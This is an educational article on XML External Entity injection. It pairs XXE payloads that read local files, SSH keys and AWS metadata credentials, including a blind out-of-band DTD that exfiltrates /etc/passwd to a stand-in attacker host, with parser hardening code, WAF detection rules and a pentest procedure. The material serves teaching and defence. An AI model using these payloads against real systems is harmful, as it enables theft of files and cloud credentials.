XXE - XML External Entity Injection
XML External Entity (XXE) Injection is a vulnerability in which an XML parser resolves external entities embedded in attacker-supplied XML documents. Attackers use XXE to read local files (/etc/passwd, AWS credentials), carry out SSRF attacks, or, in rare cases, achieve remote code execution. XXE is listed as A4 in the OWASP Top 10 2017 and occurs particularly with insecurely configured XML parsers (libxml2, Java SAXParser, .NET XmlDocument).
XXE is one of the most insidious web vulnerabilities because it often occurs in hidden XML processing paths: in upload endpoints, SOAP services, SVG files, Office documents, and REST APIs with XML support. An attacker who finds XXE in an internal system can use it to read cloud credentials from the metadata service and, depending on the permissions of the instance role, compromise large parts of the AWS infrastructure.
XXE Basic Principle
Normal XML Entities
<!DOCTYPE note [
<!ENTITY name "Alice">
]>
<note>
<to>&name;</to>
</note>
&name; expands to "Alice"—completely harmless.
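The expansion can be observed with a minimal sketch using Python's standard-library xml.etree.ElementTree, which expands internal entities declared in the document's own DTD. The names NOTE_XML and recipient are illustrative and not part of any library.

```python
import xml.etree.ElementTree as ET

# The note document from above, with an internal entity named "name".
NOTE_XML = """<!DOCTYPE note [
  <!ENTITY name "Alice">
]>
<note>
  <to>&name;</to>
</note>"""


def recipient(xml_text: str) -> str:
    """Parse the note and return the text of <to> after entity expansion."""
    root = ET.fromstring(xml_text)
    return root.findtext("to")


if __name__ == "__main__":
    # The parser has already replaced &name; with the declared value.
    print(recipient(NOTE_XML))
```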
External Entity – The Problem
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
The parser reads /etc/passwd and substitutes its content for &xxe;. If the application echoes the parsed value, the server returns the content of /etc/passwd in the response.
Why Is This Possible?
- The XML standard allows external entities
- Many XML parsers enable external entities by default
- Java SAX parser: external entities are resolved by default unless explicitly disabled
- libxml2: external entity loading enabled by default before version 2.9.0
- .NET XmlDocument: insecure by default before .NET Framework 4.5.2
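How much depends on parser configuration can be seen in a small sketch with Python's standard-library xml.sax, which has not resolved external general entities by default since Python 3.7.1. The sketch parses the same payload twice, once with the feature off and once with it deliberately switched on. It reads a harmless temporary file instead of /etc/passwd; TextCollector, parse_text, and demo are names invented for this illustration.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data seen while parsing."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse xml_bytes and return its text content."""
    parser = xml.sax.make_parser()
    # Off by default since Python 3.7.1; enabled here only for demonstration.
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def demo():
    """Return (text with the safe setting, text with external entities on)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp) / "secret.txt"  # stand-in for a sensitive file
        secret.write_text("TOP-SECRET")
        payload = (
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{secret.as_uri()}">]>'
            "<foo>&xxe;</foo>"
        ).encode()
        return parse_text(payload, False), parse_text(payload, True)


if __name__ == "__main__":
    safe, unsafe = demo()
    print("external entities off:", repr(safe))
    print("external entities on: ", repr(unsafe))
```

The only difference between the two calls is a single feature flag, which is why XXE is usually treated as a configuration problem rather than a flaw in the XML format itself.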
XXE Payloads
File Reading (Linux)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
Typical Target Files:
| Path | Content |
|---|---|
| file:///etc/passwd | User accounts |
| file:///etc/shadow | Password hashes (if accessible!) |
| file:///etc/hosts | Internal hostnames |
| file:///proc/self/environ | Environment variables (API keys!) |
| file:///home/user/.ssh/id_rsa | SSH private keys |
| file:///var/www/html/config.php | Database passwords |
File Reading (Windows)
- file:///C:/Windows/system32/drivers/etc/hosts
- file:///C:/inetpub/wwwroot/web.config - IIS configuration
- file:///C:/Users/Administrator/.ssh/id_rsa
AWS Credentials via XXE + SSRF
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role">
]>
<foo>&xxe;</foo>
This payload reads temporary AWS credentials from the EC2 Instance Metadata Service (IMDS). It is a critical finding in AWS environments: the credentials carry the permissions of the instance role, and in the worst case the entire account can be compromised.
Blind XXE (Out-of-Band)
If the response does not reflect the entity content, the attacker can still exfiltrate data over a separate channel.
Proof of XXE Vulnerability:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://ATTACKER-SERVER.com/test?data=">
]>
<foo>&xxe;</foo>
The attacker’s server receives an HTTP request as proof.
External DTD on attacker’s server (evil.dtd):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER.com/?data=%file;'>">
%eval;
%exfil;
Payload to target system:
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://ATTACKER.com/evil.dtd">
%remote;
]>
<foo>trigger</foo>
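On the receiving side, the attacker's server only has to record incoming requests. The following is a minimal sketch of such a callback listener using Python's standard library; hits, CallbackHandler, and start_listener are hypothetical names, and a real engagement would more likely use an existing tool such as Burp Collaborator or interactsh.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

hits = []  # one dict per received callback


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        url = urlparse(self.path)
        # Record who called and which data arrived in the query string.
        hits.append({
            "client": self.client_address[0],
            "path": url.path,
            "query": parse_qs(url.query, keep_blank_values=True),
        })
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format, *args):
        pass  # silence the default stderr logging


def start_listener(host="127.0.0.1", port=0):
    """Start the listener in a background thread; port 0 picks a free port."""
    server = HTTPServer((host, port), CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Any request that reaches the listener proves that the target parser resolved an external entity, and the query field holds whatever the external DTD appended to the URL.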
XXE via SVG Upload
SVG files are XML. Image upload endpoints such as "Upload Avatar" or "Thumbnail" are frequently affected:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>
When the SVG is rendered, the hostname appears in the image.
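One way to defend an upload endpoint is to refuse any SVG that carries a DOCTYPE before it reaches the renderer. The sketch below does this with Python's standard-library expat bindings. It assumes that legitimate uploads never need a DTD, which is a policy choice rather than a requirement of the SVG format; DoctypeForbidden and reject_doctype are names made up for this example.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an uploaded XML document contains a DOCTYPE declaration."""


def reject_doctype(data: bytes) -> None:
    """Raise DoctypeForbidden if data declares a DOCTYPE.

    Malformed XML raises xml.parsers.expat.ExpatError instead.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called as soon as the parser sees <!DOCTYPE ...>, i.e. before
        # any entity declared inside it could be used.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed in uploads")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


if __name__ == "__main__":
    reject_doctype(b'<svg xmlns="http://www.w3.org/2000/svg"><text>ok</text></svg>')
    print("clean SVG accepted")
```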
XXE via XLSX/DOCX Upload
Office documents are ZIP archives containing XML files. To manipulate them:
# 1. Unzip the original file:
unzip doc.docx -d doc/
# 2. Add the XXE payload to [Content_Types].xml
# 3. Repack from inside the directory so the archive paths stay at the root:
cd doc && zip -r ../evil.docx .
XXE in SOAP Web Services
POST /soap/service HTTP/1.1
Content-Type: text/xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="...">
<soap:Body>
<getUser>
<username>&xxe;</username>
</getUser>
</soap:Body>
</soap:Envelope>
XXE Mitigation Measures
Configure the parser securely
Java (SAXParser, DocumentBuilder):
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Disable external entities:
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// OR more granularly:
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
DocumentBuilder builder = factory.newDocumentBuilder();
Python (defusedxml) - recommended:
# DO NOT USE: lxml.etree.parse(file) - XXE-vulnerable!
# GOOD: Use defusedxml:
import defusedxml.ElementTree as ET
tree = ET.parse(file) # Raises on entity declarations and external references; pass forbid_dtd=True to reject DTDs as well
Python (lxml) - explicitly configured:
from lxml import etree
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
load_dtd=False
)
tree = etree.parse(file, parser)
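A parser configuration like the ones above can be checked with a small canary test. The sketch below writes a marker to a temporary file, references it through an external entity, and reports whether the marker shows up in the parsed text. It is shown against the standard-library xml.etree.ElementTree so that it runs without extra packages; CANARY, leaks_external_entity, and stdlib_parse are hypothetical names, and any other parser wrapper with the same bytes-to-text signature can be passed in instead.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

CANARY = "xxe-canary-7f3a"  # arbitrary marker chosen for this sketch


def leaks_external_entity(parse_to_text) -> bool:
    """Return True if parse_to_text(xml_bytes) exposes a local file via XXE."""
    with tempfile.TemporaryDirectory() as tmp:
        canary_file = Path(tmp) / "canary.txt"
        canary_file.write_text(CANARY)
        payload = (
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{canary_file.as_uri()}">]>'
            "<foo>&xxe;</foo>"
        ).encode()
        try:
            text = parse_to_text(payload)
        except Exception:
            return False  # rejecting the document outright is a safe outcome
        return CANARY in (text or "")


def stdlib_parse(xml_bytes: bytes) -> str:
    """Parser under test: plain ElementTree from the standard library."""
    root = ET.fromstring(xml_bytes)
    return "".join(root.itertext())


if __name__ == "__main__":
    print("leaks:", leaks_external_entity(stdlib_parse))
```

Running such a check in the test suite helps catch a later change that switches entity resolution back on.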
PHP:
// PHP < 8.0: disable the entity loader explicitly (the function is deprecated as of PHP 8.0):
libxml_disable_entity_loader(true);
// PHP 8.0+: external entity loading is disabled by default.
// Nevertheless, pass LIBXML_NONET and never pass LIBXML_NOENT or LIBXML_DTDLOAD:
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET);
.NET (XmlDocument, XmlReader):
// Insecure (< .NET 4.5.2):
XmlDocument insecureDoc = new XmlDocument();
insecureDoc.Load(xmlInput); // Vulnerable to XXE!
// Safe:
XmlDocument doc = new XmlDocument();
doc.XmlResolver = null; // Disable external resolvers
doc.Load(xmlInput);
// XmlReader (safer by default since .NET 4.5.2):
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
using XmlReader reader = XmlReader.Create(input, settings);
NGINX / WAF Level (ModSecurity rules):
SecRule REQUEST_BODY "@rx SYSTEM\s*[\"']" \
"id:1001,phase:2,t:none,deny,status:400,msg:'XXE Attempt'"
SecRule REQUEST_BODY "@rx <!ENTITY" \
"id:1002,phase:2,t:none,deny,status:400,msg:'XXE Entity Declaration'"
Design Recommendations
- Use JSON instead of XML where possible (JSON has no entity problem)
- SVG upload: convert to PNG/JPG on the server side (Pillow/ImageMagick)
- Office document parsers: use specialized libraries (Apache POI, python-docx) instead of parsing the XML directly
- Input validation: check Content-Type and magic bytes
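The last recommendation can be sketched as a comparison of the declared Content-Type with the file's leading bytes. The table below is a small illustrative selection, not a complete list, and the function name is hypothetical. Because SVG is plain text and has no magic bytes, this sketch rejects it outright, and a ZIP signature alone does not prove that a DOCX or XLSX is benign.

```python
# Leading bytes ("magic bytes") for a few upload types.
MAGIC_BYTES = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
    "application/zip": b"PK\x03\x04",  # also the container format of DOCX/XLSX
}


def upload_matches_declared_type(declared_type: str, data: bytes) -> bool:
    """Return True only if the declared type is known and the bytes agree."""
    magic = MAGIC_BYTES.get(declared_type)
    return magic is not None and data.startswith(magic)


if __name__ == "__main__":
    xml_disguised_as_png = b'<?xml version="1.0"?><!DOCTYPE foo []><foo/>'
    print(upload_matches_declared_type("image/png", xml_disguised_as_png))
```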
XXE Testing
Pentest Procedure
Step 1 - Identify XML input points:
- All endpoints with Content-Type: application/xml or text/xml
- Upload endpoints (SVG, DOCX, XLSX, XML)
- SOAP endpoints
- JSON APIs with optional XML support (Accept: application/xml)
Step 2 - Test the basic payload:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR.net/test">
]>
<xml>&xxe;</xml>
Does a DNS lookup or HTTP request arrive at the Collaborator?
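For repeated tests, the probe can be scripted. The following sketch builds the request with Python's standard library; the function name build_probe and the example hostnames are placeholders, and the Content-Type may need to be text/xml depending on the endpoint. Sending is left to the caller, for example with urllib.request.urlopen, within an authorized test.

```python
import urllib.request


def build_probe(endpoint: str, callback_url: str) -> urllib.request.Request:
    """Build a POST request carrying the basic out-of-band XXE probe."""
    body = (
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{callback_url}">]>\n'
        "<xml>&xxe;</xml>"
    ).encode("utf-8")
    return urllib.request.Request(
        endpoint,
        data=body,
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


if __name__ == "__main__":
    # Placeholder hosts; replace with the target and the callback server.
    req = build_probe("https://target.example/api", "http://callback.example/test")
    print(req.get_method(), req.full_url)
    print(req.data.decode())
```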
Step 3 - Attempt file reading:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<xml>&xxe;</xml>
Is the hostname visible in the response?
Step 4 - Check for blind XXE:
If no direct output appears, attempt OOB exfiltration. interactsh is suitable as a callback server.
Step 5 - Automated Tools:
nuclei -t nuclei-templates/vulnerabilities/xxe/ -u https://target.com
Burp Pro: automatic XXE detection in Active Scan with Burp Collaborator as OOB proof.